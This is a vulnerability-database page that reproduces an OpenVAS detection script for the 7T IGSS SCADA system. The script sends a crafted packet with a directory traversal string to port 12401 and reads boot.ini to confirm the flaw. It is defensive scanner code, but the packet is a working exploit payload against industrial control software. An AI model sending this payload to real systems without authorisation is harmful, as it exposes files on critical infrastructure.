Lucene search

K
openvasThis script is Copyright (C) 2011 Greenbone Networks GmbHOPENVAS:103128
HistoryMar 28, 2011 - 12:00 a.m.

7T Interactive Graphical SCADA System Multiple Security Vulnerabilities

2011-03-2800:00:00
This script is Copyright (C) 2011 Greenbone Networks GmbH
plugins.openvas.org
17

0.726 High

EPSS

Percentile

98.1%

7T Interactive Graphical SCADA System is prone to multiple security
vulnerabilities.

Exploiting these issues may allow remote attackers to execute
arbitrary code within the context of the affected application or
perform unauthorized actions using directory traversal strings.

###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_igss_46936.nasl 7015 2017-08-28 11:51:24Z teissa $
#
# 7T Interactive Graphical SCADA System Multiple Security Vulnerabilities
#
# Authors:
# Michael Meyer <[email protected]>
#
# Update By:
# Veerendra G.G <[email protected]> on 2011-05-18
# Updated CVE and Reference section with exploit-db id.
#
# Copyright:
# Copyright (c) 2011 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

tag_summary = "7T Interactive Graphical SCADA System is prone to multiple security
vulnerabilities.

Exploiting these issues may allow remote attackers to execute
arbitrary code within the context of the affected application or
perform unauthorized actions using directory traversal strings.";


if (description)
{
 script_id(103128);
 script_version("$Revision: 7015 $");
 script_tag(name:"last_modification", value:"$Date: 2017-08-28 13:51:24 +0200 (Mon, 28 Aug 2017) $");
 script_tag(name:"creation_date", value:"2011-03-28 13:42:17 +0200 (Mon, 28 Mar 2011)");
 script_tag(name:"cvss_base", value:"10.0");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_cve_id("CVE-2011-1565", "CVE-2011-1567");
 script_bugtraq_id(46936);

 script_name("7T Interactive Graphical SCADA System Multiple Security Vulnerabilities");

 script_xref(name : "URL" , value : "https://www.securityfocus.com/bid/46936");
 script_xref(name : "URL" , value : "http://www.igss.com/");
 script_xref(name : "URL" , value : "http://www.securityfocus.com/archive/1/517080");
 script_xref(name : "URL" , value : "http://www.exploit-db.com/exploits/17300/");
 script_xref(name : "URL" , value : "http://www.exploit-db.com/exploits/17024/");
 script_xref(name : "URL" , value : "http://aluigi.org/adv/igss_1-adv.txt");
 script_xref(name : "URL" , value : "http://aluigi.org/adv/igss_2-adv.txt");
 script_xref(name : "URL" , value : "http://aluigi.org/adv/igss_3-adv.txt");
 script_xref(name : "URL" , value : "http://aluigi.org/adv/igss_4-adv.txt");
 script_xref(name : "URL" , value : "http://aluigi.org/adv/igss_5-adv.txt");
 script_xref(name : "URL" , value : "http://aluigi.org/adv/igss_6-adv.txt");
 script_xref(name : "URL" , value : "http://aluigi.org/adv/igss_7-adv.txt");
 script_xref(name : "URL" , value : "http://aluigi.org/adv/igss_8-adv.txt");

 script_tag(name:"qod_type", value:"remote_vul");
 script_category(ACT_ATTACK);
 script_family("General");
 script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
 script_dependencies("find_service.nasl");
 script_require_ports(12401);
 script_tag(name : "summary" , value : tag_summary);
 exit(0);
}

port = 12401;
if(!get_port_state(port))exit(0);

soc = open_sock_tcp(port);
if(!soc)exit(0);

ex = raw_string(0x9b,0x00,0x01,0x00,0x34,0x12,0x0d,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
                0x00,0x00,0x03,0x00,0x00,0x00);

ex += crap(data:raw_string(0x2e,0x2e,0x5c), length:48);
ex += string("boot.ini");
ex += crap(data:raw_string(0x00), length:77);

send(socket:soc, data: ex);
recv = recv(socket:soc,length:8072);

if("[boot loader]" >< recv) {
  security_message(port:port);
  exit(0);
}

exit(0);

0.726 High

EPSS

Percentile

98.1%